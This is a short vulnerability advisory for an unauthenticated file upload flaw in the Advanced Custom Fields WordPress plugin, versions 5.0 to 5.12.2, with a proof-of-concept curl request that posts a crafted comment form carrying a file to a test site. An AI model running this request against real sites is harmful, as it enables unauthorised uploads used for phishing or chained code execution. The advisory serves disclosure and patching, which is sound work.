Advanced Custom Fields 5.0-5.12.2 - Unauthenticated File Upload

The plugin allows unauthenticated users to upload files allowed in a default WP configuration (so PHP is not possible) if there is a frontend form available. This vulnerability was introduced in the 5.0 rewrite and did not exist prior to that release. By default WordPress does not allow uploading of .php files so this vulnerability is not easily wormable, but there are many other file types that can be uploaded that can be then used with another exploit to execute code or used in a phishing attack to get a user to download and execute a resource from a “trusted” site.

PoC

The nonce is retrieved from a form in the frontend curl \ -i -s -k -X ‘POST’ \ -F “comment=Test comment” \ -F ‘_acf_post_id=1’ \ -F ‘_acf_validation=1’ \ -F ‘_acf_nonce=ba2ef314e0’ \ -F ‘_acf_changed=0’ \ -F ‘acf[field_62c8939d255d8]=Something’ \ -F ‘author=testing’ \ -F ‘[email protected]’ \ -F ‘url=’ \ -F ‘submit=Post+Comment’ \ -F ‘comment_post_ID=1’ \ -F ‘comment_parent=0’ \ -F ‘acf[name][email protected]’ \ ‘http://play.local/wp-comments-post.php’